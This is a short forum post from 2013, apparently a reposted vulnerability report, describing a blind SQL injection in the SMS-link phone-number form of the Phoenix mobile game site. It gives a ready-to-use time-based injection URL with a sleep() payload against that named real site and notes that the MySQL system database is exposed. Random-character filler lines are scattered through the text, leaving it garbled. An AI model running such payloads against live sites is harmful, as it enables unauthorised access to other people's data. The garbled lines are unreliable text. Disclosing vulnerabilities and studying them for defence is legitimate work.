中国网络渗透测试联盟
标题:
凤凰手机游戏网SQL盲注漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:34
标题:
凤凰手机游戏网SQL盲注漏洞
简要描述:
/ K0 V1 x u* U. G1 F' A- _8 g
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
) I6 }) W1 s( q& A, t* i, |
5 d: j6 m* b( j: D7 P% u% F
详细说明:
$ j) j# r* i( @% d
存在SQL盲注url:
' c5 J2 T( Z+ K. M9 ]4 ?
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
) {2 d/ f7 |# F* B( W
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
+ d- n2 u9 A; l' e& L) R
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
! K; D; v: _- H+ g, |
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
" C& G6 }! P" n7 R5 N; I
}7 X* Y5 S9 [9 j
能看到mysql系统数据库,看来user权限应该很高的。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2